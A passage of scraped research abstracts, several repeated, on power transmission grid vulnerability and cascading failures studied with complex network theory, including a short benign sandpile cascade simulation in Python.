Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. 
A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the spanish 400 kV, the french 400 kV and the italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. 
The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. 
In this paper, detailed models of the components in the power grid are constructed, and a weighted, directed graph is provided. First, the connections among buses (rather than only substations, as in traditional methods), lines, transformers and generators are modelled in detail. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. Finally, the robustness and fault-dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmission substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems.
This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Cascade-based attacks on complex networks. paper_content: We live in a modern world supported by large, complex networks. Examples range from financial markets to communication and transportation systems. In many realistic situations the flow of physical quantities in the network, as characterized by the loads on nodes, is important. We show that for such networks where loads can redistribute among the nodes, intentional attacks can lead to a cascade of overload failures, which can in turn cause the entire or a substantial part of the network to collapse. This is relevant for real-world networks that possess a highly heterogeneous distribution of loads, such as the Internet and power grids. We demonstrate that the heterogeneity of these networks makes them particularly vulnerable to attacks in that a large-scale cascade may be triggered by disabling a single key node. This brings obvious concerns on the security of such systems. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. 
While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Model for cascading failures in complex networks paper_content: Large but rare cascades triggered by small initial shocks are present in most of the infrastructure networks. Here we present a simple model for cascading failures based on the dynamical redistribution of the flow on the network. We show that the breakdown of a single node is sufficient to collapse the efficiency of the entire system if the node is among the ones with largest load. This is particularly important for real-world networks with a highly heterogeneous distribution of loads such as the Internet and electrical power grids. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Originally published in: WIT Transactions on Ecology and the Environment, 2009, vol. 121, p. 527-537 --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Attacks and Cascades in Complex Networks paper_content: This paper reviews two problems in the security of complex networks: cascades of overload failures on nodes and range-based attacks on links.
Cascading failures have been reported for numerous networks and refer to the subsequent failure of other parts of the network induced by the failure of or attacks on only a few nodes. We investigate a mechanism leading to cascades of overload failures in complex networks by constructing a simple model incorporating the flow of physical quantities in the network. The second problem is motivated by the fact that most existing works on security of complex networks consider attacks on nodes rather than on links. We address attacks on links. Our investigation leads to the finding that many scale-free networks are more sensitive to attacks on short-range than on long-range links. Besides its importance concerning network security, our result has the unexpected implication that the small-world phenomenon in these scale-free networks is mainly due to short-range links. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non-topological reliability measures.
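For the Bak–Tang–Wiesenfeld sandpile dynamics referenced in the interdependent-networks entry above, a minimal single-network sketch is given below. It assumes networkx, and the toppling rule, dissipation probability, and random regular test graph are simplifications chosen for illustration rather than the modular or coupled-grid graphs studied in that paper.

```python
import random
from collections import deque
import networkx as nx

def sandpile_cascade_sizes(G, grains=3000, dissipation=0.05, seed=0):
    """Minimal BTW-style sandpile on a graph: a node topples when its load reaches
    its degree, passing one grain to each neighbour; each passed grain is lost with
    a small dissipation probability so the system reaches a steady state. Returns
    the number of topplings triggered by each dropped grain (the cascade size)."""
    rng = random.Random(seed)
    nodes = list(G)
    deg = dict(G.degree)
    load = {n: 0 for n in nodes}
    sizes = []
    for _ in range(grains):
        s = rng.choice(nodes)
        load[s] += 1
        topplings = 0
        unstable = deque([s] if deg[s] > 0 and load[s] >= deg[s] else [])
        while unstable:
            n = unstable.popleft()
            if load[n] < deg[n]:
                continue
            load[n] -= deg[n]
            topplings += 1
            for m in G[n]:
                if rng.random() > dissipation:   # grain survives dissipation
                    load[m] += 1
                    if load[m] >= deg[m]:
                        unstable.append(m)
            if load[n] >= deg[n]:                # node may need to topple again
                unstable.append(n)
        sizes.append(topplings)
    return sizes

G = nx.random_regular_graph(3, 200, seed=1)      # toy stand-in for a grid topology
sizes = sandpile_cascade_sizes(G)
print("largest cascade:", max(sizes), "topplings out of", len(sizes), "drops")
```

Coupling two such graphs with a variable number of inter-network edges is the natural next step for reproducing, at sketch level, the trade-off between cascade suppression and cascade import discussed in that entry.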
--- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the spanish 400 kV, the french 400 kV and the italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Self-organized criticality: An explanation of the 1/f noise. paper_content: We show that dynamical systems with spatial degrees of freedom naturally evolve into a self-organized critical point. Flicker noise, or 1/f noise, can be identified with the dynamics of the critical state. This picture also yields insight into the origin of fractal objects. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. 
The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Cascading Link Failure in the Power Grid: A Percolation-Based Analysis paper_content: Large-scale power blackouts caused by cascading failure are inflicting enormous socioeconomic costs. We study the problem of cascading link failures in power networks modelled by random geometric graphs from a percolation-based viewpoint. To reflect the fact that links fail according to the amount of power flow going through them, we introduce a model where links fail according to a probability which depends on the number of neighboring links. We devise a mapping which maps links in a random geometric graph to nodes in a corresponding dual covering graph. This mapping enables us to obtain the first-known analytical conditions on the existence and non-existence of a large component of operational links after degree-dependent link failures. Next, we present a simple but descriptive model for cascading link failure, and use the degree-dependent link failure results to obtain the first-known analytical conditions on the existence and non-existence of cascading link failures. --- paper_title: Classes of small-world networks paper_content: We study the statistical properties of a variety of diverse real-world networks. We present evidence of the occurrence of three classes of small-world networks: (a) scale-free networks, characterized by a vertex connectivity distribution that decays as a power law; (b) broad-scale networks, characterized by a connectivity distribution that has a power law regime followed by a sharp cutoff; and (c) single-scale networks, characterized by a connectivity distribution with a fast decaying tail. Moreover, we note for the classes of broad-scale and single-scale networks that there are constraints limiting the addition of new links. 
Our results suggest that the nature of such constraints may be the controlling factor for the emergence of different classes of networks. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. 
We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Mean-field theory for scale-free random networks paper_content: Random networks with complex topology are common in Nature, describing systems as diverse as the world wide web or social and business networks. Recently, it has been demonstrated that most large networks for which topological information is available display scale-free features. Here we study the scaling properties of the recently introduced scale-free model, that can account for the observed power-law distribution of the connectivities. We develop a mean-field method to predict the growth dynamics of the individual vertices, and use this to calculate analytically the connectivity distribution and the scaling exponents. The mean-field method can be used to address the properties of two variants of the scale-free model, that do not display power-law scaling. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. 
The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Power Grid Network Evolutions for Local Energy Trading paper_content: The shift towards an energy Grid dominated by prosumers (consumers and producers of energy) will inevitably have repercussions on the distribution infrastructure. Today it is a hierarchical one designed to deliver energy from large scale facilities to end-users. Tomorrow it will be a capillary infrastructure at the Medium and Low Voltage levels that will support local energy trading among prosumers. In [74], we analyzed the Dutch Power Grid and made an initial analysis of the economic impact topological properties have on decentralized energy trading. In this paper, we go one step further and investigate how dierent networks topologies and growth models facilitate the emergence of a decentralized market. In particular, we show how the connectivity plays an important role in improving the properties of reliability and pathcost reduction. From the economic point of view, we estimate how the topological evolutions facilitate local electricity distribution, taking into account the main cost ingredient required for increasing network connectivity, i.e., the price of cabling. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. 
We conclude that evaluating vulnerability in power ... --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: A vulnerability assessment algorithm for the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is currently an unweighted, undirected graph. Because this model is far from the real power system, it can sometimes produce wrong results. In this paper, the components of the power grid are modelled in detail and a weighted, directed graph is provided. First, the connections among buses (rather than only substations, as in traditional methods), lines, transformers and generators are simulated in detail. Second, the direction of power flow in the grid is considered, as is the components' tolerance to disturbances. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed, and the key components and weak areas are indicated. Finally, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed with the proposed method. The North China power grid is used as an example to validate the approach. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: A monograph on the structure and dynamics of small-world networks, examining models that interpolate between ordered lattices and random graphs and how such topologies shape dynamical processes such as disease spreading and synchronisation; the western United States power grid is among the empirical networks analysed.
--- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmission substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users.
With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. 
